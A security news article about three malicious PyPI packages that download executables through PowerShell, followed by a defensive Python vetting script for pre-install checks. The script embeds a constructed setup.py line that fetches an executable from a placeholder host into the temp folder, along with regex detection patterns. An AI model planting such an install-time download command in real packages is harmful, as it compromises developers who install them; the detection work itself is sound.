Cybercriminals often plant malicious packages in public software repositories to reach victims through supply chain attacks. These repositories make attractive staging grounds because developers tend to trust them and rarely expect an installed package to infect them. Recently, three malicious Python packages named colorslib, httpslib, and libhttps were discovered on PyPI, the Python Package Index.

Libraries impacted

FortiGuard researchers discovered the three packages while monitoring the open-source ecosystem and published their findings.
  • An author named Lolip0p became active on the official PyPI repository on January 7 and published the colorslib and httpslib packages on the same day. He published the libhttps package on January 12.
  • Further analysis revealed that all three packages are identical and carry a project description that looks legitimate and clean.
  • All versions of the packages (Colorslib 4.6.11, Colorslib 4.6.12, Httpslib 4.6.9, Httpslib 4.6.11, Httpslib 4.6.12, Libhttps 4.6.12, and others) were found to be malicious.

Modus operandi

The packages attempt to launch PowerShell with a suspicious URL that serves malicious executable files.
  • An executable named Oxyz.exe is downloaded from the URL; it drops another executable, update.exe.
  • The second executable runs from a temporary folder and drops a series of files into that folder.
  • One of the dropped files, SearchProtocolHost.exe, is flagged as malicious by several vendors.

Although the URL had not previously been flagged by other threat researchers, some vendors already detected the downloaded executable files as malicious.

Conclusion

Lack of moderation and automated security controls in public software repositories allows anyone to use them as a platform to spread malware. Even inexperienced attackers can launch typosquatting, dependency confusion, or simple social engineering attacks by abusing these repositories. Thus, users should always perform due diligence before downloading and running any package, especially packages from new authors.
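As an added example (not FortiGuard's or Cyware's tooling), the script below turns the two defender-side points of this report into a pre-install check: it scans a package's setup.py for the install-time PowerShell/remote-download pattern described under "Modus operandi", and it flags packages whose first upload to PyPI is only days old, the "new author" signal from the conclusion. The metadata dicts, dates, setup.py texts and the placeholder host are all constructed for the example; the metadata follows the shape of the public PyPI JSON API (`releases` mapping a version to files with `upload_time_iso_8601`), so the same function can be pointed at a real response.

```python
"""Pre-install vetting of a PyPI package (added example, not the report's own
tooling). Combines a static scan of setup.py for install-time PowerShell and
download indicators with a metadata check for very recently created packages."""
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

# Regexes for the behaviours described in the report: spawning PowerShell,
# referencing a remote URL, launching a process, naming a Windows executable,
# or working out of the temp folder. Any single indicator can be benign, so
# vet_package() reports combinations.
INDICATORS = {
    "powershell": re.compile(r"\bpowershell(\.exe)?\b", re.IGNORECASE),
    "remote_url": re.compile(r"https?://[^\s'\"]+", re.IGNORECASE),
    "process_spawn": re.compile(
        r"\b(os\.system|os\.popen|subprocess\.(run|call|Popen|check_output|check_call))\s*\("
    ),
    "windows_exe": re.compile(r"\b\w+\.exe\b", re.IGNORECASE),
    "temp_dir": re.compile(r"(%TEMP%|\$env:TEMP|tempfile\.)", re.IGNORECASE),
}


def scan_setup_py(source: str) -> Dict[str, List[int]]:
    """Map each indicator that fires to the 1-based line numbers where it fires."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def package_age_days(metadata: dict, now: datetime) -> Optional[float]:
    """Days since the earliest file upload in a PyPI JSON-API style 'releases'
    mapping (version -> list of files carrying 'upload_time_iso_8601')."""
    uploads = [
        datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
        for files in metadata.get("releases", {}).values()
        for f in files
    ]
    if not uploads:
        return None
    return (now - min(uploads)) / timedelta(days=1)


def vet_package(metadata: dict, setup_py: str, now: datetime,
                max_age_days: int = 30) -> List[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings: List[str] = []
    hits = scan_setup_py(setup_py)
    if "powershell" in hits:
        findings.append(f"setup.py invokes PowerShell at line(s) {hits['powershell']}")
    if "remote_url" in hits and "process_spawn" in hits:
        findings.append("setup.py spawns a process and references a remote URL "
                        "(download-and-execute pattern)")
    if "windows_exe" in hits and "temp_dir" in hits:
        findings.append("setup.py stages a Windows executable in the temp folder")
    age = package_age_days(metadata, now)
    if age is not None and age < max_age_days:
        findings.append(f"package first uploaded {age:.0f} day(s) ago; "
                        "treat the author as unvetted")
    return findings


# Constructed reference time and metadata (dates are illustrative only).
NOW = datetime(2023, 1, 20, tzinfo=timezone.utc)
NEW_PACKAGE_METADATA = {
    "releases": {
        "4.6.11": [{"upload_time_iso_8601": "2023-01-07T10:00:00.000000Z"}],
        "4.6.12": [{"upload_time_iso_8601": "2023-01-07T11:30:00.000000Z"}],
    }
}
OLD_PACKAGE_METADATA = {
    "releases": {"1.0.0": [{"upload_time_iso_8601": "2021-03-01T00:00:00.000000Z"}]}
}

# Constructed setup.py mimicking the install-time behaviour described in the
# report; the host is a placeholder, not the URL used in the campaign.
SUSPICIOUS_SETUP_PY = r'''
from setuptools import setup
import os
os.system('powershell -Command "iwr http://placeholder.invalid/Oxyz.exe -OutFile $env:TEMP\Oxyz.exe"')
setup(name="colorslib", version="4.6.12")
'''

# Constructed benign setup.py: a homepage URL alone should not be flagged.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="examplelib", version="1.0.0", url="https://example.invalid/examplelib")
'''

if __name__ == "__main__":
    for label, meta, src in [("suspicious", NEW_PACKAGE_METADATA, SUSPICIOUS_SETUP_PY),
                             ("benign", OLD_PACKAGE_METADATA, BENIGN_SETUP_PY)]:
        print(label, vet_package(meta, src, NOW) or ["no findings"])
```

The benign sample deliberately contains a URL so that a lone `remote_url` hit does not raise a finding; only the combination with a process spawn does. In practice this scan belongs on the sdist downloaded to a staging directory (never on a package that has already been installed), and the age threshold is a policy knob rather than a verdict.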
Cyware Publisher